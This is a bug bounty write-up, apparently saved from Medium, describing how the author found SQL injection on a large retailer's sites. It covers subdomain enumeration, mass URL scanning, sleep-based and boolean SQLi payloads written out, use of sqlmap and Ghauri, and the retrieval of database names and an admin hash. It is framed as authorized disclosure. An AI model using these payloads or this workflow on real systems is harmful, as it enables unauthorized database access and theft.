Professional Documents
Culture Documents
How I Got Owned A Multi-Billion Dollar Retailer's MySQL Databases Using Simple SQL Injection by Nav1n? Mar, 2023 Medium
How I Got Owned A Multi-Billion Dollar Retailer's MySQL Databases Using Simple SQL Injection by Nav1n? Mar, 2023 Medium
Search Medium
nav1n�
� Following
Save
This is my first article on Medium, I normally hate writing blogs these days as I’m
very active on twitter sharing my bugbounty experience and tips If I find it
interesting. I’m not a good writer as well, if you find typos or grammatical errors
please pardon me.
1 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
I didn't use any major tools or techniques, but the one each and every bug bounty
hunter uses everyday.
Keep reading the story of one of my best discoveries ever (I guess!). The post I
2 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
believe is a little lengthy, skip the beginning part if you do not wish to read the blah-
blahs.
Disclaimer: Below article is for educational purpose only. I’m no way endorse the
hacking or unethical ways to hack/test a website unless you have obtained a
permission to do so.
I ran some of the dorks and found hundreds of targets, but most of them are VDPs
with HoFs and no rewards, I kept looking and found this non-English target. They
had a security.txt page which said the scope applies to all their group of companies’
web assets including the international ones. The reward table said, they offer up to
3.5K EUR for SQLi and RCE and 500 for XSS etc, I decided to work on this target
hoping to find some SQLi or RCE/ CVEs etc.
#1 Subdomain Enumeration:
My methodology is to find as much as subdomains as possible if the target is huge
and allows subdomain enumeration. To enumerate subdomains, I prefer Netlas,
crt.sh and securitytrails.com.
I agree that securitytrails service charge is every expensive if you compare it to a lot of
alternatives, but their free tier gives 50 API runs with unlimited subdomain search per
month.
3 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
Netlas:
https://app.netlas.io/certs/?q=certificate.subject.organization%3A%22Microsoft%20Corpora
SecurityTrails:
Once I have the list from the CT, I head to SecurityTrails, which I use the following
curl command (Not mine, I found in a discord server) to find subdomains of their
main website.
The script returns around 2k subdomains. I copied all of them to my excel and
filtered the duplicates.
Funny part, I still use excel to remove duplicates from my huge lists, I believe this is the
best and efficient way, at lest for me ;)
#3 HTTP Probing:
Now I have exactly 3154 unique subdomains, I copied them to my Kali machine and
ran the HTTPx against them, in return, I got 2892 urls in the basket that are ready
4 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
Since my target is huge and ParamSpider by default supports only a single url (Do
not understand why you do this to us @0xAsm0d3us) so I had to find an alternate
way to achieve this.
I found a peace of script with my old friend. This script takes a list of urls and sends
it through xrags removes duplicates and gives you a list. However, I had some errors
while running, but the list a ready.
The results ware shocking, I now have a whooping One million, seven hundred and
ninety six thousand, one hundred and forty nine (1,796,149) lines…
The file size itself is ~96mb. I tought its not a wise idea to run all of them through
BurpSuite or SQLMAP because the Kali and the host will eat-up a lot of resources
and eventually crash, so I decided to break the files into multiple smaller size files
of 10mb each and work on them one by one.
I setup my Burp Suite and started scanning the small list. I started to get a lot of low
5 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
hanging issues like open-redirect, CORS, and even a few XSS, but no high or critical
issues.
Note: A lot of readers asked me how it is possible to scan multiple urls in the Burp
Suite. Yes, its possible with Burp Suite Professional version, here is some more
information: https://portswigger.net/blog/launching-scans.
I didn't get major vulns in the first file, so I let the Burp to do its job on the second
file and took my wife and kids for a weekend dinner. When we return after 3–4
hours, the burp was still running but there was a red exclamatory icon was flashing
with issue type (SQL Injection).
The burpsuite finally found boolean based sql injection for me. I checked the server
and its Apache. sent the vulnerable url to repeater with multiple sleep queries like:
1'XOR(SELECT(1)FROM(SELECT(SLEEP(8)))a)XOR’Z, 1' ORDER BY 1--+ , 1 or
sleep(5) , but sadly I was getting a JSON message saying: “Success” from the server.
It seems the WAF/Server was doing some kind of sanitation of known SQLi payloads.
#4 First Breakthrough
I spent an hour trying different methods to see at least an error or execute sleep(),
nothing worked. The GET request didn't work, I decided to change the request to
POST and sent the simple payload 1=1' as a value for the parameter, and voila here I
6 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version for the right
syntax to use near ‘’1=1'’))
Now I know the SQL Injection is possible on this site. Before moving to SQLMAP, I
wanted to see how many endpoints using this vulnerable parameter, so I extended
my search in the Kali and grepped the parameter “xxx”. I found only 4 out-of 2892
geographically based subdomains are using this parameter. When I open the links
to see if there is any forms or input fields, I was redirected to homepage. This
confirmed the page is not active anymore.
When I checked on archive.org, found a cached version that showed me the page is
kind of user experience enhancing suggestion page, most of them are in a alien
language, I left the archive.org and head back to my Kali VM.
I copied the request into a file and run the SQLMAP with bare minimum -r
request.txt -p xxx — random-agent flag, it failed to find the exploit, I got multiple
errors, 500 4xx etc, but unfortunately SQLMAP failed me every time.
In my recent tweet I asked for a help from the community on a similar situation,
there were some good suggestions, but none of them worked here except the one
7 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
https://twitter.com/nav1n0x/status/1630627895952527361
https://twitter.com/nav1n0x/status/1630627895952527361
I sent the same request to Ghauri and here is the result. Ghauri took just 4 minutes
to find the exploit for time-based blind SQL Injection and Boole-based blind.
8 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
Now the time to retrieve the database name to prove the exploit. I run the following
command:
And here I have the nice beautiful xxx*** database name, which suggest the db is of
a production database.
I run Ghauri on entire endpoints, and received different database including staging
9 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
Winner:
SQLMAP — o | Ghauri — 1
10 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
As the column p***_***_** is present, I know I can be the new owner of the database
:), but I just want the bounty not the database.
11 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
aaand here it is. I know have the admin password hash and the password which
would let me own any of their database from 3 major eStore.
I humbly sent them a detailed report on my findings and my analysis, I got the reply
onSqlmap
Monday evening (time difference)
Bugbounty Writeup
asking to see if there are more vulnerable
Sql Injection
parts, but I couldn't find any.
Same night I got acknowledged about the acceptance of the vulnerability. They are
internally discussing about the bounty and possibly applying the fix. I reported 4
SQL Injections, 3 XSS and an open-redirect,
224 I’m
12 expecting a payout of minimum 4.5
K EUR.
That’s all.
Takeaways:
12 of 13 20-04-2023, 11:35 am
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases... https://medium.com/@nav1n/how-i-got-owned-a-multi-billion-dollar-ret...
3. The Archive.org has more vulnerable endpoints cached then the live ones.
4. If the GET request didn't work, try POST and change the protocol to HTTP1/0 to
2/0 see if it helps.
Thank you for reading. Will comeback soon with another interesting story of
multiple Log4Shell findings on a major Sports goods manufacturer’s webapp.
13 of 13 20-04-2023, 11:35 am